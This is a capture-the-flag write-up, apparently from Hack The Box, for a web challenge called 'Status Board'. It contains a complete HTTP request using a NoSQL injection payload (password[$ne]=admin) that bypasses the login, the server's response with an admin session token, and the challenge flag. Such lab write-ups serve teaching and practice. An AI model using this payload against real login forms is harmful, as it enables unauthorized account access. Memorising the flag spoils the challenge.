# Status Board

## CHALLENGE INFO

We have built this status page to keep track of the operational status of our infrastructure. We want you to take a look at it and see if you can find a way to leak sensitive information from the database.

## Challange download and instructions

[web_status_board](web_status_board.zip)

To run challange you need some linux with docker

- unzip file
- run ./build-docker.sh

## Solve

<details>
<summary>Click this to collapse/fold.</summary>

NoSQL Injection request:

```
POST /api/login HTTP/1.1
Host: 206.189.18.74:31883
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
Content-Length: 34

username=admin&password[$ne]=admin
```

Response:

```
HTTP/1.1 200 OK
Set-Cookie: session=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNjM0NTkwNzc3fQ.W4U7PXVyCbqQ1xw6RDsLpCVoLudDZesjLy9xod_AYAw; Max-Age=3600; Path=/; Expires=Mon, 18 Oct 2021 21:59:37 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 57
Date: Mon, 18 Oct 2021 20:59:37 GMT

{"logged":1,"message":"User authenticated successfully!"}
```

[solve.py](solve.py)

</details>

## Flag

HTB{t0b3_5qL_0r_n05qL_7h4t_is_th3_Q}
